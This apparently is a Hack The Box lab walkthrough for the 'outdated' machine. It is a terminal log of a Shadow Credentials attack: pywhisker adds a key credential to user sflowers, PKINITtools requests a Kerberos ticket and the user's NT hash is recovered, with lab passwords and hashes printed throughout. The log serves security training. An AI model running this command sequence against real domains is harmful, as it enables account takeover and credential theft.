pywhisker / gettgtpkinit.py / getnthash.py
pywhisker installed with: pipx instal pywhisker
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pipx list
venvs are in /home/bolke/.local/share/pipx/venvs
apps are exposed on your $PATH at /home/bolke/.local/bin
manual pages are exposed at /home/bolke/.local/share/man
package certipy-ad 5.0.2, installed using Python 3.13.2
– certipy
package donpapi 2.1.0, installed using Python 3.13.2
– DonPAPI
– donpapi
– dpp
package impacket 0.13.0.dev0+20250415.195618.c384b5fb, installed using Python 3.13.2
– DumpNTLMInfo.py
–snip–
package pywhisker 0.1.2, installed using Python 3.13.2
– pywhisker
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pywhisker –action list -d outdated.htb -u btables -p 5myBPLPDKT3Bfq –dc-ip 10.10.11.175 -t sflowers –use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ pywhisker –action add -d outdated.htb -u btables -p 5myBPLPDKT3Bfq –dc-ip 10.10.11.175 -t sflowers –use-ldaps
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 4f2cd3e5-b6c1-3a74-b0b6-b852cd703b5c
[*] Updating the msDS-KeyCredentialLink attribute of sflowers
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: tFxD90ok.pfx
[*] Must be used with password: pSDHrW2Yha3Gy80yHFXj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ git clone https://github.com/dirkjanm/PKINITtools.git
Cloning into ‘PKINITtools’…
remote: Enumerating objects: 45, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 45 (delta 14), reused 10 (delta 10), pack-reused 27 (from 1)
Receiving objects: 100% (45/45), 28.08 KiB | 1.65 MiB/s, done.
Resolving deltas: 100% (21/21), done.
┌──(bolke㉿bolke)-[~/htb/outdated]
└─$ cd PKINITtools
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass pSDHrW2Yha3Gy80yHFXj outdated.htb/sflowers sflowers.ccache -dc-ip 10.10.11.175
2025-06-09 16:27:33,183 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
zsh: segmentation fault python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass sflowers.ccache
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ virtualenv venv
created virtual environment CPython3.13.2.final.0-64 in 193ms
creator CPython3Posix(dest=/home/bolke/htb/outdated/PKINITtools/venv, clear=False, no_vcs_ignore=False, global=False)
seeder FromAppData(download=False, pip=bundle, via=copy, app_data_dir=/home/bolke/.local/share/virtualenv)
added seed packages: pip==25.0.1
activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator
┌──(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ source venv/bin/activate
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip install minikerberos
Collecting minikerberos
Using cached minikerberos-0.4.6-py3-none-any.whl.metadata (734 bytes)
Collecting asn1crypto>=1.5.1 (from minikerberos)
Using cached asn1crypto-1.5.1-py2.py3-none-any.whl.metadata (13 kB)
–snip–
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: asn1crypto, tqdm, six, pycryptodomex, pycparser, oscrypto, h11, unicrypto, cffi, cryptography, asysocks, minikerberos
Successfully installed asn1crypto-1.5.1 asysocks-0.2.13 cffi-1.17.1 cryptography-45.0.3 h11-0.16.0 minikerberos-0.4.6 oscrypto-1.3.0 pycparser-2.22 pycryptodomex-3.23.0 six-1.17.0 tqdm-4.67.1 unicrypto-0.0.10
if timer error : minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: “The clock skew is too great”
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ sudo ntpdate outdated.htb
2025-06-10 00:30:55.216907 (+0200) +28799.608686 +/- 0.015638 outdated.htb 10.10.11.175 s1 no-leap
CLOCK: time stepped by 28799.608686
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python gettgtpkinit.py -cert-pfx ../tFxD90ok.pfx -pfx-pass pSDHrW2Yha3Gy80yHFXj outdated.htb/sflowers sflowers.ccache -dc-ip 10.10.11.175
2025-06-10 00:31:09,795 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-06-10 00:31:09,815 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-06-10 00:31:19,261 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-06-10 00:31:19,261 minikerberos INFO 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
INFO:minikerberos:43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
2025-06-10 00:31:19,271 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip list
Package Version
————- ——-
asn1crypto 1.5.1
asysocks 0.2.13
cffi 1.17.1
cryptography 45.0.3
h11 0.16.0
minikerberos 0.4.6
oscrypto 1.3.0
pip 25.0.1
pycparser 2.22
pycryptodomex 3.23.0
six 1.17.0
tqdm 4.67.1
unicrypto 0.0.10
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ ls
getnthash.py gets4uticket.py gettgtpkinit.py LICENSE ntlmrelayx README.md requirements.txt sflowers.ccache venv
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ export KRB5CCNAME=sflowers.ccache
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ klist
Ticket cache: FILE:sflowers.ccache
Default principal: sflowers@OUTDATED.HTB
Valid starting Expires Service principal
06/10/2025 00:31:19 06/10/2025 10:31:19 krbtgt/OUTDATED.HTB@OUTDATED.HTB
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python getnthash.py outdated.htb/sflowers -key 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
Traceback (most recent call last):
File “/home/bolke/htb/outdated/PKINITtools/getnthash.py”, line 33, in <module>
from pyasn1.type.univ import noValue, SequenceOf, Integer
ModuleNotFoundError: No module named ‘pyasn1’
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ ls
getnthash.py gets4uticket.py gettgtpkinit.py LICENSE ntlmrelayx README.md requirements.txt sflowers.ccache venv
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ pip install -r requirements.txt
Collecting impacket (from -r requirements.txt (line 1))
Using cached impacket-0.12.0-py3-none-any.whl
Requirement already satisfied: minikerberos in ./venv/lib/python3.13/site-packages (from -r requirements.txt (line 2)) (0.4.6)
Collecting pyasn1>=0.2.3 (from impacket->-r requirements.txt (line 1))
Using cached pyasn1-0.6.1-py3-none-any.whl.metadata (8.4 kB)
Collecting pyasn1_modules (from impacket->-r requirements.txt (line 1))
Using cached pyasn1_modules-0.4.2-py3-none-any.whl.metadata (3.5 kB)
Requirement already satisfied: pycryptodomex in ./venv/lib/python3.13/site-packages (from impacket->-r requirements.txt (line 1)) (3.23.0)
–snip–
Using cached MarkupSafe-3.0.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (23 kB)
Using cached werkzeug-3.1.3-py3-none-any.whl (224 kB)
Using cached dnspython-2.7.0-py3-none-any.whl (313 kB)
Installing collected packages: setuptools, pyasn1, markupsafe, itsdangerous, dnspython, click, charset_normalizer, blinker, werkzeug, pyasn1_modules, ldap3, jinja2, cryptography, pyOpenSSL, ldapdomaindump, flask, impacket
Attempting uninstall: cryptography
Found existing installation: cryptography 45.0.3
Uninstalling cryptography-45.0.3:
Successfully uninstalled cryptography-45.0.3
Successfully installed blinker-1.9.0 charset_normalizer-3.4.2 click-8.2.1 cryptography-42.0.8 dnspython-2.7.0 flask-3.1.1 impacket-0.12.0 itsdangerous-2.2.0 jinja2-3.1.6 ldap3-2.9.1 ldapdomaindump-0.10.0 markupsafe-3.0.2 pyOpenSSL-24.0.0 pyasn1-0.6.1 pyasn1_modules-0.4.2 setuptools-80.9.0 werkzeug-3.1.3
┌──(venv)─(bolke㉿bolke)-[~/htb/outdated/PKINITtools]
└─$ python getnthash.py outdated.htb/sflowers -key 43e105de2c74d5fa799f9c9822bb30a84e914bad1161b87413630b7b1fb7accf
/home/bolke/htb/outdated/PKINITtools/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 – Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
1fcdb1f6015dcb318cc77bb2bda14db5
References used